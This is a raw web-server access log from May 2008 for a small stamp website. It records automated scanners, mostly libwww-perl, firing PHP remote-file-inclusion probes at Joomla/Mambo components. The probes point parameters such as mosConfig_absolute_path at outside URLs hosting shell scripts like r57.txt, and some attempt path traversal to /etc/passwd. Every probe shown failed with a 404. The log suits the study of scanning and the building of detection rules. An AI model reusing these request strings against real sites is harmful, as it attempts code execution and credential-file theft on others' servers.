82.78.216.197 - - [25/May/2008:19:32:14 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.mathstamps.com"
82.78.216.197 - - [25/May/2008:19:32:14 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.mathstamps.com"
65.167.19.30 - - [25/May/2008:19:34:45 -0700] "GET /logs/access_080421.log/components/com_simpleboard/image_upload.php?sbp=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
65.167.19.30 - - [25/May/2008:19:34:45 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
65.167.19.30 - - [25/May/2008:19:34:45 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
65.167.19.30 - - [25/May/2008:19:34:49 -0700] "GET /logs/access_080421.log/components/com_simpleboard/image_upload.php?sbp=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
65.167.19.30 - - [25/May/2008:19:34:49 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
65.167.19.30 - - [25/May/2008:19:34:49 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
65.167.19.30 - - [25/May/2008:19:34:51 -0700] "GET /logs/access_080421.log/components/com_simpleboard/image_upload.php?sbp=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
65.167.19.30 - - [25/May/2008:19:34:51 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
65.167.19.30 - - [25/May/2008:19:34:52 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
65.167.19.30 - - [25/May/2008:19:34:56 -0700] "GET /logs/access_080421.log/components/com_simpleboard/image_upload.php?sbp=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
65.167.19.30 - - [25/May/2008:19:34:56 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
65.167.19.30 - - [25/May/2008:19:34:56 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
70.84.192.18 - - [25/May/2008:19:35:48 -0700] "GET /logs/access_080414.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.84.192.18 - - [25/May/2008:19:35:48 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.84.192.18 - - [25/May/2008:19:35:48 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
217.160.203.190 - - [25/May/2008:19:35:52 -0700] "GET /logs/contrib/mx_glance_sdesc.php?mx_root_path=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
217.160.203.190 - - [25/May/2008:19:35:52 -0700] "GET /contrib/mx_glance_sdesc.php?mx_root_path=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.7.206.59 - - [25/May/2008:19:38:43 -0700] "GET /logs/access_080414.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.7.206.59 - - [25/May/2008:19:38:43 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.7.206.59 - - [25/May/2008:19:38:43 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
76.177.254.58 - - [25/May/2008:19:42:28 -0700] "GET /logs/access_080324.log HTTP/1.1" 200 213245 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)" "www.mathstamps.com"
209.62.26.18 - - [25/May/2008:19:44:35 -0700] "GET /logs/access_080414.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
209.62.26.18 - - [25/May/2008:19:44:35 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
209.62.26.18 - - [25/May/2008:19:44:35 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
63.134.253.108 - - [25/May/2008:19:46:01 -0700] "GET /logs/access_080414.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
63.134.253.108 - - [25/May/2008:19:46:01 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
63.134.253.108 - - [25/May/2008:19:46:01 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
201.12.151.34 - - [25/May/2008:19:50:46 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/DnL/id.txtt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
201.12.151.34 - - [25/May/2008:19:50:47 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/DnL/id.txtt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
201.12.151.34 - - [25/May/2008:19:50:47 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/DnL/id.txtt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
201.12.151.34 - - [25/May/2008:19:50:47 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/DnL/id.txtt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
193.111.11.7 - - [25/May/2008:19:51:40 -0700] "GET /logs//appserv/mainhttp://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.111.11.7 - - [25/May/2008:19:51:44 -0700] "GET //appserv/mainhttp://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
189.20.143.86 - - [25/May/2008:19:51:59 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://cuteonlinegames.com/r57.txt? HTTP/1.1" 404 275 "-" "-" "www.mathstamps.com"
75.125.252.82 - - [25/May/2008:19:52:42 -0700] "GET /logs/access_080414.log/index2.php?option=com_sefservicemap&Itemid=&mosConfig_absolute_path=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
75.125.252.82 - - [25/May/2008:19:52:42 -0700] "GET /index2.php?option=com_sefservicemap&Itemid=&mosConfig_absolute_path=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
75.125.252.82 - - [25/May/2008:19:52:42 -0700] "GET /logs/index2.php?option=com_sefservicemap&Itemid=&mosConfig_absolute_path=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
63.134.253.108 - - [25/May/2008:19:53:13 -0700] "GET /logs/access_080421.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
209.62.26.18 - - [25/May/2008:19:53:26 -0700] "GET /logs/access_080421.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.236.255.134 - - [25/May/2008:19:56:47 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
82.78.216.197 - - [25/May/2008:19:57:58 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.mathstamps.com"
82.78.216.197 - - [25/May/2008:19:57:58 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.mathstamps.com"
82.78.216.197 - - [25/May/2008:19:58:33 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.mathstamps.com"
82.78.216.197 - - [25/May/2008:19:58:33 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.mathstamps.com"
82.78.216.197 - - [25/May/2008:19:58:51 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.mathstamps.com"
82.78.216.197 - - [25/May/2008:19:58:51 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.mathstamps.com"
65.167.19.30 - - [25/May/2008:19:59:45 -0700] "GET /logs/access_080428.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
65.167.19.30 - - [25/May/2008:19:59:47 -0700] "GET /logs/access_080428.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
72.47.201.117 - - [25/May/2008:20:01:20 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.mathstamps.com"
72.47.201.117 - - [25/May/2008:20:01:20 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.mathstamps.com"
193.111.11.7 - - [25/May/2008:20:01:26 -0700] "GET /logs/index.php?root_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.mathstamps.com"
193.111.11.7 - - [25/May/2008:20:01:26 -0700] "GET /index.php?root_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.mathstamps.com"
58.26.137.64 - - [25/May/2008:20:08:57 -0700] "GET /logs/contrib/mx_glance_sdesc.php?mx_root_path=http://municoinco.cl/weba/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.mathstamps.com"
58.26.137.64 - - [25/May/2008:20:08:58 -0700] "GET /contrib/mx_glance_sdesc.php?mx_root_path=http://municoinco.cl/weba/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.mathstamps.com"
202.179.0.195 - - [25/May/2008:20:11:24 -0700] "GET /logs/admin/classes/TplLoad.php?full_path_to_public_program=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.mathstamps.com"
202.179.0.195 - - [25/May/2008:20:11:24 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.mathstamps.com"
216.126.64.194 - - [25/May/2008:20:15:52 -0700] "GET /logs/access_080414.log/index.php?root_path=http://myhelderberg.com/auction//phpAdsNew/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.126.64.194 - - [25/May/2008:20:15:52 -0700] "GET /index.php?root_path=http://myhelderberg.com/auction//phpAdsNew/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.126.64.194 - - [25/May/2008:20:15:52 -0700] "GET /logs/index.php?root_path=http://myhelderberg.com/auction//phpAdsNew/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
195.56.189.33 - - [25/May/2008:20:18:20 -0700] "GET /logs/access_080421.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.126.64.194 - - [25/May/2008:20:19:29 -0700] "GET /index.php?root_path=http://myhelderberg.com/auction//phpAdsNew/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
74.6.22.183 - - [25/May/2008:20:20:21 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
74.6.9.90 - - [25/May/2008:20:20:21 -0700] "GET /?M=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
201.12.151.34 - - [25/May/2008:20:20:31 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
201.12.151.34 - - [25/May/2008:20:20:49 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
201.12.151.34 - - [25/May/2008:20:20:50 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
62.112.193.46 - - [25/May/2008:20:22:34 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://copapetrobrasdetenis.com.br/admin/internas_upload/.ownz/safeon.gif??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.112.193.46 - - [25/May/2008:20:22:35 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://copapetrobrasdetenis.com.br/admin/internas_upload/.ownz/safeon.gif??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.214.32.233 - - [25/May/2008:20:23:02 -0700] "GET /logs/access_080414.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.214.32.233 - - [25/May/2008:20:23:02 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.214.32.233 - - [25/May/2008:20:23:03 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.214.72.189 - - [25/May/2008:20:23:46 -0700] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.mathstamps.com"
85.214.72.189 - - [25/May/2008:20:23:46 -0700] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.mathstamps.com"
64.38.4.3 - - [25/May/2008:20:24:34 -0700] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.mathstamps.com"
64.38.4.3 - - [25/May/2008:20:24:34 -0700] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.mathstamps.com"
201.12.151.34 - - [25/May/2008:20:28:13 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
201.12.151.34 - - [25/May/2008:20:28:15 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
201.12.151.34 - - [25/May/2008:20:28:15 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
201.12.151.34 - - [25/May/2008:20:28:16 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
62.146.45.29 - - [25/May/2008:20:28:51 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://copapetrobrasdetenis.com.br/admin/internas_upload/.ownz/safeon.gif??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.146.45.29 - - [25/May/2008:20:28:51 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://copapetrobrasdetenis.com.br/admin/internas_upload/.ownz/safeon.gif??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.146.45.29 - - [25/May/2008:20:29:05 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://copapetrobrasdetenis.com.br/admin/internas_upload/.ownz/safeon.gif??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.146.45.29 - - [25/May/2008:20:29:06 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://copapetrobrasdetenis.com.br/admin/internas_upload/.ownz/safeon.gif??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
201.12.151.34 - - [25/May/2008:20:29:21 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
201.12.151.34 - - [25/May/2008:20:29:23 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
85.236.48.244 - - [25/May/2008:20:30:19 -0700] "GET /logs/access_080421.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.236.48.244 - - [25/May/2008:20:30:20 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.236.48.244 - - [25/May/2008:20:30:20 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
70.85.192.194 - - [25/May/2008:20:31:56 -0700] "GET /logs/access_080421.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
70.85.192.194 - - [25/May/2008:20:31:57 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
70.85.192.194 - - [25/May/2008:20:31:57 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
77.79.246.70 - - [25/May/2008:20:32:47 -0700] "GET /logs/access_080421.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
77.79.246.70 - - [25/May/2008:20:32:48 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
77.79.246.70 - - [25/May/2008:20:32:48 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
85.214.32.233 - - [25/May/2008:20:36:20 -0700] "GET /logs/access_080421.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
198.106.22.9 - - [25/May/2008:20:40:40 -0700] "GET /logs/access_080421.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.los-chamos.com/Fungky/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.mathstamps.com"
198.106.22.9 - - [25/May/2008:20:40:41 -0700] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://www.los-chamos.com/Fungky/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.mathstamps.com"
198.106.22.9 - - [25/May/2008:20:40:41 -0700] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://www.los-chamos.com/Fungky/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.mathstamps.com"
194.158.195.132 - - [25/May/2008:20:41:42 -0700] "GET /logs/access.log//include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
